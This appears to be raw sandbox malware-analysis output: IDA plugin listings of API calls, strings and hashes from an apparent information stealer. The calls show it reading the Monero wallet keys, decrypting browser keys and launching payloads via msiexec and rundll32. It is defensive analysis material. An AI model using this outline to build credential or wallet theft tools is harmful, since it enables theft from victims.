                                            • Snapshot File: hcaresult_6_2_400000_oqIz1tfl5h.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: Filelstrcat$lstrcpy$lstrlen$Pointer$??2@BinaryCloseCreateCryptHandleReadSizeStringmemcpymemset
                                            • String ID:
                                            • API String ID: 3555725114-3916222277
                                            • Opcode ID: bdcf7920c9ab84c4787d47d5031650711a85c06ed1b0856f23742556519dcaf9
                                            • Instruction ID: fb2464dfdb87d028b9341c66972094ccea7bc9213c5b9a6eafc00a4a54def107
                                            • Opcode Fuzzy Hash: bdcf7920c9ab84c4787d47d5031650711a85c06ed1b0856f23742556519dcaf9
                                            • Instruction Fuzzy Hash: 2FE13E71911108ABCB14FBA1DC91FEEB779AF14314F40416EF10673191EF386A9ACB6A
                                            APIs
                                              • Part of subcall function 0303A9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 0303A9EF
                                              • Part of subcall function 0303AB87: lstrcpy.KERNEL32(00000000,?), ref: 0303ABD9
                                              • Part of subcall function 0303AB87: lstrcat.KERNEL32(00000000), ref: 0303ABE9
                                              • Part of subcall function 0303AB07: lstrcpy.KERNEL32(?,00420E17), ref: 0303AB6C
                                              • Part of subcall function 0303AC17: lstrlen.KERNEL32(?,0064A1F0,?,00424FBC,00420E17), ref: 0303AC2C
                                              • Part of subcall function 0303AC17: lstrcpy.KERNEL32(00000000), ref: 0303AC6B
                                              • Part of subcall function 0303AC17: lstrcat.KERNEL32(00000000,00000000), ref: 0303AC79
                                            • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,0064A63C,00000000,?,0042144C,00000000,?,?), ref: 0302CCD3
                                            • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 0302CCF0
                                            • GetFileSize.KERNEL32(00000000,00000000), ref: 0302CCFC
                                            • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 0302CD0F
                                            • ??2@YAPAXI@Z.MSVCRT(-00000001), ref: 0302CD1C
                                            • ReadFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 0302CD40
                                            • StrStrA.SHLWAPI(?,0064A1B0,00420B52), ref: 0302CD5E
                                            • StrStrA.SHLWAPI(00000000,0064A364), ref: 0302CD85
                                            • StrStrA.SHLWAPI(?,0064A4D0,00000000,?,00421458,00000000,?,00000000,00000000,?,0064A15C,00000000,?,00421454,00000000,?), ref: 0302CF09
                                            • StrStrA.SHLWAPI(00000000,0064A4CC), ref: 0302CF20
                                              • Part of subcall function 0302CA87: memset.MSVCRT ref: 0302CABA
                                              • Part of subcall function 0302CA87: lstrlen.KERNEL32(?,00000001,?,00000000,00000000,00000000), ref: 0302CAD8
                                              • Part of subcall function 0302CA87: CryptStringToBinaryA.CRYPT32(?,00000000), ref: 0302CAE3
                                              • Part of subcall function 0302CA87: memcpy.MSVCRT(?,?,?), ref: 0302CB79
                                            • StrStrA.SHLWAPI(?,0064A4CC,00000000,?,0042145C,00000000,?,00000000,0064A0DC), ref: 0302CFC1
                                            • StrStrA.SHLWAPI(00000000,0064A5A8), ref: 0302CFD8
                                              • Part of subcall function 0302CA87: lstrcat.KERNEL32(?,00420B46), ref: 0302CBAA
                                              • Part of subcall function 0302CA87: lstrcat.KERNEL32(?,00420B47), ref: 0302CBBE
                                              • Part of subcall function 0302CA87: lstrcat.KERNEL32(?,00420B4E), ref: 0302CBDF
                                            • lstrlen.KERNEL32(00000000), ref: 0302D0AB
                                            • CloseHandle.KERNEL32(00000000), ref: 0302D103
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.1601162206.0000000003020000.00000040.00001000.00020000.00000000.sdmp, Offset: 03020000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_3020000_oqIz1tfl5h.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: Filelstrcat$lstrcpy$lstrlen$Pointer$??2@BinaryCloseCreateCryptHandleReadSizeStringmemcpymemset
                                            • String ID:
                                            • API String ID: 3555725114-3916222277
                                            • Opcode ID: 9842806969cad6799f0f7568e9bc81044bc23dbf52ae901b6399e5f6c005bae5
                                            • Instruction ID: b5c21240d18b2a50fa3b1735e1b74b105dd797b1d99e3062e41d85fc3e872d61
                                            • Opcode Fuzzy Hash: 9842806969cad6799f0f7568e9bc81044bc23dbf52ae901b6399e5f6c005bae5
                                            • Instruction Fuzzy Hash: AAE1317AA11308ABCB14EBA4DD90FEEB77DAF56300F044159F146AB1A1DF346A89CF50
                                            APIs
                                              • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                            • RegOpenKeyExA.ADVAPI32(00000000,02E26F78,00000000,00020019,00000000,004205B6), ref: 004183A4
                                            • RegEnumKeyExA.ADVAPI32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 00418426
                                            • wsprintfA.USER32 ref: 00418459
                                            • RegOpenKeyExA.ADVAPI32(00000000,?,00000000,00020019,00000000), ref: 0041847B
                                            • RegCloseKey.ADVAPI32(00000000), ref: 0041848C
                                            • RegCloseKey.ADVAPI32(00000000), ref: 00418499
                                              • Part of subcall function 0041A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0041A7E6
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.1599324639.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000006.00000002.1599324639.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000006.00000002.1599324639.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000006.00000002.1599324639.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000006.00000002.1599324639.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000006.00000002.1599324639.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_400000_oqIz1tfl5h.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: CloseOpenlstrcpy$Enumwsprintf
                                            • String ID: - $%s\%s$?
                                            • API String ID: 3246050789-3278919252
                                            • Opcode ID: 10eb0c450f8aa63e58ce6e2e13bbd26e49cdc9fd0544e95f6096289088943245
                                            • Instruction ID: f03ee3f6de4a678c4a24becac03c3675d5d4362b87af83515ad79f9b006405b7
                                            • Opcode Fuzzy Hash: 10eb0c450f8aa63e58ce6e2e13bbd26e49cdc9fd0544e95f6096289088943245
                                            • Instruction Fuzzy Hash: B4813E75911118ABEB24DF50CD81FEAB7B9FF08714F008299E109A6180DF756BC6CFA5
                                            APIs
                                              • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                            • memset.MSVCRT ref: 00410C1C
                                            • lstrcatA.KERNEL32(?,00000000), ref: 00410C35
                                            • lstrcatA.KERNEL32(?,00420D7C), ref: 00410C47
                                            • lstrcatA.KERNEL32(?,00000000), ref: 00410C5D
                                            • lstrcatA.KERNEL32(?,00420D80), ref: 00410C6F
                                            • lstrcatA.KERNEL32(?,00000000), ref: 00410C88
                                            • lstrcatA.KERNEL32(?,00420D84), ref: 00410C9A
                                            • lstrlenA.KERNEL32(?), ref: 00410CA7
                                            • memset.MSVCRT ref: 00410CCD
                                            • memset.MSVCRT ref: 00410CE1
                                              • Part of subcall function 0041A820: lstrlenA.KERNEL32(00000000,?,?,00415B54,00420ADB,00420ADA,?,?,00416B16,00000000,?,02E24D60,?,0042110C,?,00000000), ref: 0041A82B
                                              • Part of subcall function 0041A820: lstrcpy.KERNEL32(B,00000000), ref: 0041A885
                                              • Part of subcall function 00418B60: GetSystemTime.KERNEL32(?,02DF4EB0,004205AE,?,?,?,?,?,?,?,?,?,00404963,?,00000014), ref: 00418B86
                                              • Part of subcall function 0041A920: lstrcpy.KERNEL32(00000000,?), ref: 0041A972
                                              • Part of subcall function 0041A920: lstrcatA.KERNEL32(00000000), ref: 0041A982
                                              • Part of subcall function 0041A9B0: lstrlenA.KERNEL32(?,00421110,?,00000000,00420AEF), ref: 0041A9C5
                                              • Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
                                              • Part of subcall function 0041A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AA12
                                              • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905
                                              • Part of subcall function 0041A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0041A7E6
                                              • Part of subcall function 004196C0: CreateFileA.KERNEL32(00000000,40000000,00000000,00000000,00000002,00000080,00000000,?,00410B85,?,00000000,?,00000000,004205C6,004205C5), ref: 004196E1
                                            • CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000001,00000020,00000000,00000000,?,?,00000000,?,00420D88,?,00000000), ref: 00410D5A
                                            • WaitForSingleObject.KERNEL32(?,000000FF), ref: 00410D66
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.1599324639.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000006.00000002.1599324639.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000006.00000002.1599324639.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000006.00000002.1599324639.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000006.00000002.1599324639.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000006.00000002.1599324639.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_400000_oqIz1tfl5h.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: lstrcat$lstrcpy$lstrlenmemset$Create$FileObjectProcessSingleSystemTimeWait
                                            • String ID: .exe
                                            • API String ID: 1395395982-4119554291
                                            • Opcode ID: 74a2b4eb823f66a7a773147b1627efd196d727e2fc86b427189f4ea67f13cdff
                                            • Instruction ID: 8c4414bd7b792449c86a3c64e171a12ac7102eaeec46e1acf96b3d3d4dd6cf75
                                            • Opcode Fuzzy Hash: 74a2b4eb823f66a7a773147b1627efd196d727e2fc86b427189f4ea67f13cdff
                                            • Instruction Fuzzy Hash: A78194B55111186BCB14FBA1CD52FEE7338AF44308F40419EB30A66082DE786AD9CF6E
                                            APIs
                                            • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?), ref: 0041906C
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.1599324639.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000006.00000002.1599324639.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000006.00000002.1599324639.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000006.00000002.1599324639.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000006.00000002.1599324639.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000006.00000002.1599324639.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_400000_oqIz1tfl5h.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: CreateGlobalStream
                                            • String ID: image/jpeg
                                            • API String ID: 2244384528-3785015651
                                            • Opcode ID: e883d83a5a88c000208a0b3536991fc9b742a1aee5e23c3149dc995228aa81a1
                                            • Instruction ID: d6dc09ab2bfedf2d54b470b914d8c7211c5e4dd185e8bb692af35d1d417654b8
                                            • Opcode Fuzzy Hash: e883d83a5a88c000208a0b3536991fc9b742a1aee5e23c3149dc995228aa81a1
                                            • Instruction Fuzzy Hash: 7D711B75A40208BBDB04EFE4DC99FEEB7B9FB48300F108509F515A7290DB38A945CB65
                                            APIs
                                            • strtok_s.MSVCRT ref: 00411307
                                            • strtok_s.MSVCRT ref: 00411750
                                              • Part of subcall function 0041A820: lstrlenA.KERNEL32(00000000,?,?,00415B54,00420ADB,00420ADA,?,?,00416B16,00000000,?,02E24D60,?,0042110C,?,00000000), ref: 0041A82B
                                              • Part of subcall function 0041A820: lstrcpy.KERNEL32(B,00000000), ref: 0041A885
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.1599324639.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000006.00000002.1599324639.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000006.00000002.1599324639.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000006.00000002.1599324639.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000006.00000002.1599324639.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000006.00000002.1599324639.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_400000_oqIz1tfl5h.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: strtok_s$lstrcpylstrlen
                                            • String ID:
                                            • API String ID: 348468850-0
                                            • Opcode ID: bde3d88e76cb374dc77a589280481c748b3d98596421ad73c644b27d853b8bc6
                                            • Instruction ID: 4a233ae47f87f64f9a2ed81d2cca976e3c75948f423937a2df4e62cfbc7c3e06
                                            • Opcode Fuzzy Hash: bde3d88e76cb374dc77a589280481c748b3d98596421ad73c644b27d853b8bc6
                                            • Instruction Fuzzy Hash: C7C1D6B5941218ABCB14EF60DC89FEA7379BF54304F00449EF50AA7241DB78AAC5CF95
                                            APIs
                                              • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                            • ShellExecuteEx.SHELL32(0000003C), ref: 004131C5
                                            • ShellExecuteEx.SHELL32(0000003C), ref: 0041335D
                                            • ShellExecuteEx.SHELL32(0000003C), ref: 004134EA
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.1599324639.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000006.00000002.1599324639.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000006.00000002.1599324639.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000006.00000002.1599324639.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000006.00000002.1599324639.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000006.00000002.1599324639.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_400000_oqIz1tfl5h.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: ExecuteShell$lstrcpy
                                            • String ID: /i "$ /passive$"" $.dll$.msi$<$C:\Windows\system32\msiexec.exe$C:\Windows\system32\rundll32.exe
                                            • API String ID: 2507796910-3625054190
                                            • Opcode ID: f416c3abd8d48d8571a1066b95692cbdeaad0712c422f8a8d0e8344c420d34f1
                                            • Instruction ID: 17233f41fb1950bff335544576ea1941aa871c2d7c6c7a5a475621d351ca9112
                                            • Opcode Fuzzy Hash: f416c3abd8d48d8571a1066b95692cbdeaad0712c422f8a8d0e8344c420d34f1
                                            • Instruction Fuzzy Hash: 96125F718111089ADB09FBA1DD92FEEB778AF14314F50415EF10666091EF382BDACF6A
                                            APIs
                                            • memset.MSVCRT ref: 0041429E
                                            • memset.MSVCRT ref: 004142B5
                                              • Part of subcall function 00418DE0: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,000003E8), ref: 00418E0B
                                            • lstrcatA.KERNEL32(?,00000000), ref: 004142EC
                                            • lstrcatA.KERNEL32(?,02E28F20), ref: 0041430B
                                            • lstrcatA.KERNEL32(?,?), ref: 0041431F
                                            • lstrcatA.KERNEL32(?,02E29280), ref: 00414333
                                              • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                              • Part of subcall function 00418D90: GetFileAttributesA.KERNEL32(00000000,?,00410117,?,00000000,?,00000000,00420DAB,00420DAA), ref: 00418D9F
                                              • Part of subcall function 00409CE0: StrStrA.SHLWAPI(00000000,"encrypted_key":"), ref: 00409D39
                                              • Part of subcall function 00409CE0: memcmp.MSVCRT(?,DPAPI,00000005), ref: 00409D92
                                              • Part of subcall function 004099C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 004099EC
                                              • Part of subcall function 004099C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00409A11
                                              • Part of subcall function 004099C0: LocalAlloc.KERNEL32(00000040,?), ref: 00409A31
                                              • Part of subcall function 004099C0: ReadFile.KERNEL32(000000FF,?,00000000,004102E7,00000000), ref: 00409A5A
                                              • Part of subcall function 004099C0: LocalFree.KERNEL32(004102E7), ref: 00409A90
                                              • Part of subcall function 004099C0: CloseHandle.KERNEL32(000000FF), ref: 00409A9A
                                              • Part of subcall function 004193C0: GlobalAlloc.KERNEL32(00000000,004143DD,004143DD), ref: 004193D3
                                            • StrStrA.SHLWAPI(?,02E28FB0), ref: 004143F3
                                            • GlobalFree.KERNEL32(?), ref: 00414512
                                              • Part of subcall function 00409AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,N@,00000000,00000000), ref: 00409AEF
                                              • Part of subcall function 00409AC0: LocalAlloc.KERNEL32(00000040,?,?,?,00404EEE,00000000,?), ref: 00409B01
                                              • Part of subcall function 00409AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,N@,00000000,00000000), ref: 00409B2A
                                              • Part of subcall function 00409AC0: LocalFree.KERNEL32(?,?,?,?,00404EEE,00000000,?), ref: 00409B3F
                                              • Part of subcall function 00409E10: memcmp.MSVCRT(?,v20,00000003), ref: 00409E2D
                                            • lstrcatA.KERNEL32(?,00000000), ref: 004144A3
                                            • StrCmpCA.SHLWAPI(?,004208D1), ref: 004144C0
                                            • lstrcatA.KERNEL32(00000000,00000000), ref: 004144D2
                                            • lstrcatA.KERNEL32(00000000,?), ref: 004144E5
                                            • lstrcatA.KERNEL32(00000000,00420FB8), ref: 004144F4
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.1599324639.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000006.00000002.1599324639.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000006.00000002.1599324639.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000006.00000002.1599324639.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000006.00000002.1599324639.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000006.00000002.1599324639.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_400000_oqIz1tfl5h.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: lstrcat$FileLocal$AllocFree$BinaryCryptGlobalStringmemcmpmemset$AttributesCloseCreateFolderHandlePathReadSizelstrcpy
                                            • String ID:
                                            • API String ID: 1191620704-0
                                            • Opcode ID: 0c9d0826f05218bba3054023445b60d50c1f9f43ea0f6b816602f798d9ef3330
                                            • Instruction ID: 36ee7f3ac4f34f2e69ac811a17adbc1f593ee72d5fdd25ff7e799b1d0bb6bc25
                                            • Opcode Fuzzy Hash: 0c9d0826f05218bba3054023445b60d50c1f9f43ea0f6b816602f798d9ef3330
                                            • Instruction Fuzzy Hash: 0B7165B6900208BBDB14FBE0DC85FEE7379AB88304F00459DF605A7181EA78DB55CB95
                                            APIs
                                            • memset.MSVCRT ref: 03034505
                                            • memset.MSVCRT ref: 0303451C
                                              • Part of subcall function 03039047: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 03039072
                                            • lstrcat.KERNEL32(?,00000000), ref: 03034553
                                            • lstrcat.KERNEL32(?,0064A30C), ref: 03034572
                                            • lstrcat.KERNEL32(?,?), ref: 03034586
                                            • lstrcat.KERNEL32(?,0064A5D8), ref: 0303459A
                                              • Part of subcall function 0303A9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 0303A9EF
                                              • Part of subcall function 03038FF7: GetFileAttributesA.KERNEL32(00000000,?,03021DBB,?,?,0042565C,?,?,00420E1F), ref: 03039006
                                              • Part of subcall function 03029F47: StrStrA.SHLWAPI(00000000,004212AC), ref: 03029FA0
                                              • Part of subcall function 03029F47: memcmp.MSVCRT(?,0042125C,00000005), ref: 03029FF9
                                              • Part of subcall function 03029C27: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 03029C53
                                              • Part of subcall function 03029C27: GetFileSizeEx.KERNEL32(000000FF,?), ref: 03029C78
                                              • Part of subcall function 03029C27: LocalAlloc.KERNEL32(00000040,?), ref: 03029C98
                                              • Part of subcall function 03029C27: ReadFile.KERNEL32(000000FF,?,00000000,030216F6,00000000), ref: 03029CC1
                                              • Part of subcall function 03029C27: LocalFree.KERNEL32(030216F6), ref: 03029CF7
                                              • Part of subcall function 03029C27: CloseHandle.KERNEL32(000000FF), ref: 03029D01
                                              • Part of subcall function 03039627: GlobalAlloc.KERNEL32(00000000,03034644,03034644), ref: 0303963A
                                            • StrStrA.SHLWAPI(?,0064A0D8), ref: 0303465A
                                            • GlobalFree.KERNEL32(?), ref: 03034779
                                              • Part of subcall function 03029D27: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,03025155,00000000,00000000), ref: 03029D56
                                              • Part of subcall function 03029D27: LocalAlloc.KERNEL32(00000040,?,?,?,03025155,00000000,?), ref: 03029D68
                                              • Part of subcall function 03029D27: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,03025155,00000000,00000000), ref: 03029D91
                                              • Part of subcall function 03029D27: LocalFree.KERNEL32(?,?,?,?,03025155,00000000,?), ref: 03029DA6
                                              • Part of subcall function 0302A077: memcmp.MSVCRT(?,00421264,00000003), ref: 0302A094
                                            • lstrcat.KERNEL32(?,00000000), ref: 0303470A
                                            • StrCmpCA.SHLWAPI(?,004208D1), ref: 03034727
                                            • lstrcat.KERNEL32(00000000,00000000), ref: 03034739
                                            • lstrcat.KERNEL32(00000000,?), ref: 0303474C
                                            • lstrcat.KERNEL32(00000000,00420FB8), ref: 0303475B
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.1601162206.0000000003020000.00000040.00001000.00020000.00000000.sdmp, Offset: 03020000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_3020000_oqIz1tfl5h.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: lstrcat$FileLocal$AllocFree$BinaryCryptGlobalStringmemcmpmemset$AttributesCloseCreateFolderHandlePathReadSizelstrcpy
                                            • String ID:
                                            • API String ID: 1191620704-0
                                            • Opcode ID: e8d6e6767f46891ec996ef8822d66cebf734f8a34e2b49da607d012598c1f812
                                            • Instruction ID: 0ec09b4dab3f7142e7dd3072913b2bd69c52f366f56ddfe49f71d44075c1d10d
                                            • Opcode Fuzzy Hash: e8d6e6767f46891ec996ef8822d66cebf734f8a34e2b49da607d012598c1f812
                                            • Instruction Fuzzy Hash: 627161BAA01218BBDB14EBE0DC85FEE777DAB89300F048598E605AA180DB35D749CF51
                                            APIs
                                            • memset.MSVCRT ref: 00401327
                                              • Part of subcall function 004012A0: GetProcessHeap.KERNEL32(00000000,00000104,80000001), ref: 004012B4
                                              • Part of subcall function 004012A0: HeapAlloc.KERNEL32(00000000), ref: 004012BB
                                              • Part of subcall function 004012A0: RegOpenKeyExA.ADVAPI32(000000FF,?,00000000,00020119,?), ref: 004012D7
                                              • Part of subcall function 004012A0: RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,000000FF,000000FF), ref: 004012F5
                                              • Part of subcall function 004012A0: RegCloseKey.ADVAPI32(?), ref: 004012FF
                                            • lstrcatA.KERNEL32(?,00000000), ref: 0040134F
                                            • lstrlenA.KERNEL32(?), ref: 0040135C
                                            • lstrcatA.KERNEL32(?,.keys), ref: 00401377
                                              • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                              • Part of subcall function 0041A9B0: lstrlenA.KERNEL32(?,00421110,?,00000000,00420AEF), ref: 0041A9C5
                                              • Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
                                              • Part of subcall function 0041A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AA12
                                              • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905
                                              • Part of subcall function 00418B60: GetSystemTime.KERNEL32(?,02DF4EB0,004205AE,?,?,?,?,?,?,?,?,?,00404963,?,00000014), ref: 00418B86
                                              • Part of subcall function 0041A920: lstrcpy.KERNEL32(00000000,?), ref: 0041A972
                                              • Part of subcall function 0041A920: lstrcatA.KERNEL32(00000000), ref: 0041A982
                                            • CopyFileA.KERNEL32(?,00000000,00000001), ref: 00401465
                                              • Part of subcall function 0041A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0041A7E6
                                              • Part of subcall function 004099C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 004099EC
                                              • Part of subcall function 004099C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00409A11
                                              • Part of subcall function 004099C0: LocalAlloc.KERNEL32(00000040,?), ref: 00409A31
                                              • Part of subcall function 004099C0: ReadFile.KERNEL32(000000FF,?,00000000,004102E7,00000000), ref: 00409A5A
                                              • Part of subcall function 004099C0: LocalFree.KERNEL32(004102E7), ref: 00409A90
                                              • Part of subcall function 004099C0: CloseHandle.KERNEL32(000000FF), ref: 00409A9A
                                            • DeleteFileA.KERNEL32(00000000), ref: 004014EF
                                            • memset.MSVCRT ref: 00401516
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.1599324639.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000006.00000002.1599324639.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000006.00000002.1599324639.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000006.00000002.1599324639.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000006.00000002.1599324639.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000006.00000002.1599324639.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_400000_oqIz1tfl5h.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: Filelstrcpy$lstrcat$AllocCloseHeapLocallstrlenmemset$CopyCreateDeleteFreeHandleOpenProcessQueryReadSizeSystemTimeValue
                                            • String ID: .keys$SOFTWARE\monero-project\monero-core$\Monero\wallet.keys$wallet_path
                                            • API String ID: 1930502592-218353709
                                            • Opcode ID: c1fb2d75e00c2d8f9dd5bf80775ae3441aa8fa7fb470dcc05c1c23cbe7dc55a4
                                            • Instruction ID: 674d48b949cffd92695f0a4f51b6d393b2dd06dcaa63b8f6d50fb5eb71b8da29
                                            • Opcode Fuzzy Hash: c1fb2d75e00c2d8f9dd5bf80775ae3441aa8fa7fb470dcc05c1c23cbe7dc55a4
                                            • Instruction Fuzzy Hash: AA5164B195011897CB15FB61DD91BED733CAF54304F4041ADB60A62091EE385BDACBAA
                                            APIs
                                              • Part of subcall function 0041A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0041A7E6
                                              • Part of subcall function 00406280: InternetOpenA.WININET(00420DFE,00000001,00000000,00000000,00000000), ref: 004062E1
                                              • Part of subcall function 00406280: StrCmpCA.SHLWAPI(?,02E26370), ref: 00406303
                                              • Part of subcall function 00406280: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00406335
                                              • Part of subcall function 00406280: HttpOpenRequestA.WININET(00000000,GET,?,02E2A4E0,00000000,00000000,00400100,00000000), ref: 00406385
                                              • Part of subcall function 00406280: InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 004063BF
                                              • Part of subcall function 00406280: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 004063D1
                                              • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905
                                            • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00415318
                                            • lstrlenA.KERNEL32(00000000), ref: 0041532F
                                              • Part of subcall function 00418E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00418E52
                                            • StrStrA.SHLWAPI(00000000,00000000), ref: 00415364
                                            • lstrlenA.KERNEL32(00000000), ref: 00415383
                                            • strtok.MSVCRT(00000000,?), ref: 0041539E
                                            • lstrlenA.KERNEL32(00000000), ref: 004153AE
                                              • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.1599324639.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000006.00000002.1599324639.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
